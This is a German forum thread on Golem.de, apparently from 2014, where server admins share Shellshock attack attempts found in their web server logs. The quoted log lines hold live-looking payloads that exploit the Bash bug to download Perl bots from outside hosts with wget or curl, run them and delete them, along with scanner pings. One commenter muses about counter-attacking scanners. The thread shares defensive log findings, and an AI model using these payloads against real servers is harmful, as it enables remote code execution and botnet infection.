Abo
  1. Foren
  2. Kommentare
  3. Security
  4. Alle Kommentare zum Artikel
  5. › Bash-Lücke: Die Hintergründe zu…

In Logs fündig geworden?

  1. Thema

Neues Thema Ansicht wechseln


  1. In Logs fündig geworden?

    Autor: c3rl 26.09.14 - 19:39

    Habe folgende Zeilen in meinen nginx-Logs gefunden... habt ihr auch was gefunden?

    >24.251.197.244 - - [25/Sep/2014:09:13:51 +0200] "GET / HTTP/1.1" 301 5 "-" "() { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq"

    >24.251.197.244 - - [25/Sep/2014:09:13:52 +0200] "GET / HTTP/1.1" 200 6023 "-" "() { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq"

    >89.207.135.125 - - [25/Sep/2014:11:03:27 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

    >166.78.61.142 - - [25/Sep/2014:16:46:54 +0200] "GET / HTTP/1.1" 301 5 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"

    >93.103.21.231 - - [26/Sep/2014:14:39:35 +0200] "GET / HTTP/1.1" 301 5 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://xxxxxx.de/'"



    1 mal bearbeitet, zuletzt am 26.09.14 19:41 durch c3rl.

  2. Re: In Logs fündig geworden?

    Autor: Kastenbrot 26.09.14 - 20:16

    Jep, da war auch einer, aber der war recht "harmlos" xD

    access.log:209.126.230.72, 209.126.230.72 - - [25/Sep/2014:04:32:27 +0200] "GET / HTTP/1.0" 200 177 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
    access.log:209.126.230.72, 209.126.230.72 - - [25/Sep/2014:09:17:16 +0200] "GET / HTTP/1.0" 200 177 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
    access.log:209.126.230.72, 209.126.230.72 - - [25/Sep/2014:09:28:14 +0200] "GET / HTTP/1.0" 200 177 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)

  3. Re: In Logs fündig geworden?

    Autor: Pythonimus 27.09.14 - 12:31

    89.207.135.125 - - [25/Sep/2014:11:40:09 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 4338 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

    109.202.102.224 - - [25/Sep/2014:16:22:50 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 4338 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22"

  4. Re: In Logs fündig geworden?

    Autor: Jack0 27.09.14 - 13:48

    Den
    89.207.135.125 - - [25/Sep/2014:13:27:23 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 474 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
    hatte ich auch.
    Scan aus Holland, der einen Ping nach USA auslösen soll?

  5. Re: In Logs fündig geworden?

    Autor: Kastenbrot 27.09.14 - 14:00

    Den hier fand ich auch ganz witzig:

    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET / HTTP/1.0" 200 456 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET /test HTTP/1.0" 404 484 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET / HTTP/1.0" 200 456 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET /test HTTP/1.0" 404 484 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 495 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
    access.log:70.42.149.69 - - [26/Sep/2014:23:49:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 495 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 198.49.76.152/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""

    Was ich recht spannend finde, ist die Tatsache dass man via Varnish solchen Mist rausfiltern kann so das er nicht den Apache erreicht und nebenbei F2B zum blocken nutzen oder einen Hive zum Blocken und anschließenden Angriff des Scanners nutzen kann.
    Ab hier geht der ScanSpaß schnell nach hinten los.

  6. Re: In Logs fündig geworden?

    Autor: Anonymer Nutzer 27.09.14 - 14:27

    root@XXXXXX:~# cat /var/log/apache2/error.log | grep 89.207
    [Thu Sep 25 10:21:55 2014] [error] [client 89.207.135.125] File does not exist: /var/www/cgi-sys


    Der arme Schlumpf wurde aber von Fail2Ban gesperrt für 1 Jahr :(

  7. Re: In Logs fündig geworden?

    Autor: Jack0 28.09.14 - 10:57

    xxx.xx:80 94.102.63.238 - - [28/Sep/2014:00:21:09 +0200] "GET /cgi-bin/php? HTTP/1.1" 404 482 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"

    jetzt wollen sie's aber wissen -.-

  8. Re: In Logs fündig geworden?

    Autor: Kastenbrot 28.09.14 - 15:10

    Jop scheinbar schon...
    access.log:82.97.2.26 - - [28/Sep/2014:12:21:14 +0200] "GET / HTTP/1.0" 200 177 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
    access.log:82.97.2.26, 82.97.2.26 - - [28/Sep/2014:12:21:24 +0200] "GET / HTTP/1.0" 200 177 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\""
    Ich glaub ich troll jetzt mal zurück... Hab irgendwie Spaß daran gefunden...

  9. Re: In Logs fündig geworden?

    Autor: ello 02.10.14 - 10:37

    Hatten heute auch den ersten, der wäre eventuell nicht so harmlos gewesen :)

    174.143.168.121 - - [02/Oct/2014:05:02:52 +0200] "GET //cgi-bin/bash HTTP/1.0" 301 480 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\"" "d****************.net"
    174.143.168.121 - - [02/Oct/2014:05:02:53 +0200] "GET / HTTP/1.0" 200 51276 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\"" "www.****************.net"

  10. Re: In Logs fündig geworden?

    Autor: PeterMeter 22.10.14 - 00:02

    habe auch diverse logs mit dem wget bla bla, nur mich verunsichert immer das mal 403er und manchmal kommen sie mit 200 durch. wie kann ich mir sicher sein?
    wie fuher ich so was zum test auf meinem Server selber aus?

  1. Thema

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Zum Login

Stellenmarkt
  1. OSRAM GmbH, München
  2. Lidl Dienstleistung GmbH & Co. KG, Neckarsulm
  3. Zentralinstitut für die kassenärztliche Versorgung in der Bundesrepublik Deutschland, Berlin
  4. Information und Technik Nordrhein-Westfalen (IT.NRW), Düsseldorf

Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Top-Angebote
  1. 269,00€
  2. (u. a. Far Cry New Dawn für 19,99€, Ghost Recon Wildlands für 15,99€, Rayman Legends für 4...
  3. (u. a. PUBG für 13,99€, Final Fantasy XIV - Shadowbringers für 27,49€, Mordhau für 19,99€)
  4. 14,99€ (Bestpreis!)


Haben wir etwas übersehen?

E-Mail an news@golem.de


Erneuerbare Energien: Die Energiewende braucht Wasserstoff
Erneuerbare Energien
Die Energiewende braucht Wasserstoff

Kein anderes Element ist so universell und dabei simpel aufgebaut wie Wasserstoff und das energiereiche Gas lässt sich aus fast jedem Energieträger gewinnen. Genauso vielseitig gestaltet sich seine Nutzung.
Ein Bericht von Jan Oliver Löfken

  1. Strom-Boje Mittelrhein Schwimmende Kraftwerke liefern Strom aus dem Rhein
  2. Speicherung von Überschussstrom Wasserstoff soll bei Engpässen helfen
  3. Energiewende DLR-Forscher bauen Kohlekraftwerke zu Stromspeichern um

Ursula von der Leyen: Von Zensursula zur EU-Kommissionspräsidentin
Ursula von der Leyen
Von "Zensursula" zur EU-Kommissionspräsidentin

Nach der "Rede ihres Lebens" hat das Europäische Parlament am Dienstagabend Ursula von der Leyen an die Spitze der EU-Kommission gewählt. Die Christdemokratin will sich in ihrem neuen Amt binnen 100 Tagen für einen Ethik-Rahmen für KI und ambitioniertere Klimaziele stark machen. Den Planeten retten, lautet ihr ganz großer Vorsatz.
Ein Bericht von Justus Staufburg

  1. Adsense for Search Neue Milliardenstrafe gegen Google in der EU

In eigener Sache: Neue Workshops zu agilem Arbeiten und Selbstmanagement
In eigener Sache
Neue Workshops zu agilem Arbeiten und Selbstmanagement

Wir haben in unserer Leserumfrage nach Wünschen für Weiterbildungsangebote gefragt. Hier ist das Ergebnis: Zwei neue Workshops widmen sich der Selbstorganisation und gängigen Fehlern beim agilen Arbeiten - natürlich extra für IT-Profis.

  1. Golem Akademie Golem.de startet Angebote zur beruflichen Weiterbildung
  2. In eigener Sache Zweiter Termin für Kubernetes-Seminar
  3. Leserumfrage Wie können wir dich unterstützen?

  1. Apple: iOS 12.4 mit iPhone-Migrationsfunktion ist da
    Apple
    iOS 12.4 mit iPhone-Migrationsfunktion ist da

    Apple hat mit iOS 12.4 das vierte Update seines mobilen Betriebssystems iOS 12 für iPhones, iPads und den iPod Touch veröffentlicht. Es bietet eine kabellose Migrationsfunktion und Unterstützung für Apples kommende Kreditkarte, die Apple Card.

  2. CO2: Wie Kohlebergwerke zum Klimaschutz beitragen können
    CO2
    Wie Kohlebergwerke zum Klimaschutz beitragen können

    Der Wärmesektor verursacht immense Mengen CO2. Um die Klimaziele zu erreichen, muss er dringend umgebaut werden. Ein Pilotprojekt in Aachen zeigt nun, dass ausgediente Kohlebergwerke einen wichtigen Beitrag leisten könnten.

  3. Lumi: Pampers kündigt Smart-Windel an
    Lumi
    Pampers kündigt Smart-Windel an

    Die Lumi von Pampers ist ein vernetztes System für Babys und ihre Eltern, die damit ihren Nachwuchs rund um die Uhr überwachen können. Die Windel enthält einen Feuchtigkeits- und Bewegungssensor, dazu kommen eine App und eine Full-HD-Babycam.


  1. 09:25

  2. 09:10

  3. 08:29

  4. 08:15

  5. 21:15

  6. 20:44

  7. 18:30

  8. 18:00